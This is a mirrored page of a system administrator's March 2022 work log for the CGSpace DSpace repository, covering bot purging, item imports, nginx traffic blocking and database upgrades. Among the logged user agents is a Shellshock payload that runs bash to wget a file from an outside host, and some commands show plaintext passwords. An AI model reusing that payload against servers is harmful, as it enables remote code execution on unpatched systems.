mirror of
https://github.com/alanorth/cgspace-notes.git
synced 2024-11-22 14:45:03 +01:00
14 KiB
14 KiB
title | date | author | categories | |
---|---|---|---|---|
March, 2022 | 2022-03-01T16:46:54+03:00 | Alan Orth |
|
2022-03-01
- Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
- Here are some of the more prevalent or weird ones:
- axios/0.21.1
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
- Nutraspace/Nutch-1.2 (www.nutraspace.com)
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
- Crowsnest/0.5 (+http://www.crowsnest.tv/)
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- metha/0.2.27
- ZaloPC-win32-24v454
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
- FullStoryBot/1.0 (+https://www.fullstory.com)
- Link Validity Check From: http://www.usgs.gov
- OSPScraper (+https://www.opensyllabusproject.org)
- () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"
- I submitted a pull request to COUNTER-Robots with some of these
- I purged a bunch of hits from the stats using the
check-spider-hits.sh
script:
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
2022-03-05
- Start AReS harvest
2022-03-10
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
2022-03-12
- Update all containers and rebuild OpenRXV on linode20:
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
- Then run all system updates and reboot
- Start a full harvest on AReS
2022-03-16
- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
2022-03-20
- Start a full harvest on AReS
2022-03-21
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
2022-03-22
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
- I had been meaning to update my local database...
- I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails:
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
- On my local environment I decided to run the
check-duplicates.py
script one more time with all 700 items:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down
- I looked and found many locks belonging to the REST API application:
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
301 dspaceWeb
2390 dspaceApi
- Looking at nginx's logs, I found the top addresses making requests today:
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
1977 45.5.184.2
3167 70.32.90.172
4754 54.195.118.125
5411 205.186.128.185
6826 137.184.159.211
- 137.184.159.211 is on DigitalOcean using this user agent:
GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28
- I blocked this IP in nginx and the load went down immediately
- 205.186.128.185 is on Media Temple, but it's OK because it's the CCAFS publications importer bot
- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
- 70.32.90.172 is on Media Temple and has no user agent
- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
- I verified it works as expected with an empty user agent:
$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
- I note that the nginx log shows '-' for a request with an empty user agent, which would be indistinguishable from a request with a '-', for example these were successful:
70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
- I can only assume that these requests used a literal '-' so I will have to add an nginx rule to block those too
- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester... I should ask Macaroni Bros about that
2022-03-24
- Maria from ABC asked about a reporting discrepancy on AReS
- I think it's because the last harvest was over the weekend, and she was expecting to see items submitted this week
- Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
- She asked if we can download them and upload them directly to CGSpace
- I re-created my local Artifactory container
- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
- One thing I realized is that OAI is no longer a standalone web application, it is part of the
server
app now: http://localhost:8080/server/oai/request?verb=Identify
- One thing I realized is that OAI is no longer a standalone web application, it is part of the
- Deploy PostgreSQL 12 on CGSpace (linode18) but don't switch over yet, because I see some users active
- I did this on DSpace Test in 2022-02 so I just followed the same procedure
- After that I ran all system updates and rebooted the server
2022-03-25
- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
- The space saving in indexes of recent PostgreSQL releases is awesome!
- Import a DSpace 6.x database dump from production into my local DSpace 7 database
- I see I still the same errors [I saw in 2021-04]({{< relref "2021-04.md" >}}) when testing DSpace 7.0 beta 5
- I had to delete some old migrations, as well as all Atmire ones first:
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
- Then I was able to migrate to DSpace 7 with
dspace database migrate ignored
as the DSpace upgrade notes say- I see that the flash of unstyled content bug still exists on dspace-angluar... ouch!
- Start a harvest on AReS
2022-03-26
- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3
2022-03-28
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
- I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Abenet and I noticed 1,735 items in CTA's community that have the title "delete"
- We asked Peter and he said we should delete them
- I exported the CTA community metadata and used OpenRefine to filter all items with the "delete" title, then used the "expunge" bulkedit action to remove them
- I realized I forgot to clean up the old Let's Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
- I also removed the pre-Ubuntu 20.04 Let's Encrypt stuff from the Ansble infrastructure playbooks
2022-03-29
- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
- After that I did some normalization on the
cg.subject.system
metadata and extracted a few dozen countries to the country field - Start a harvest on AReS
2022-03-30
- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
- I started looking into the request regarding the CIAT Library PDFs
- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
- The links seem to be down though! I emailed Paola to ask
2022-03-31
- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
- I will do the following for CMS and G1GC on DSpace Test:
- Wait for startup
- Reload home page
- Log in
- Do a search for "livestock"
- Click AGROVOC facet for livestock
- dspace index-discovery -b
- dspace-statistics-api index
- With CMS the Discovery Index took:
real 379m19.245s
user 267m17.704s
sys 4m2.937s
- Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
- I extracted a list of URLs from CGSpace to send him:
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
COPY 4552
- I did some checks and cleanups in OpenRefine because there are some values with "#page" etc
- Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books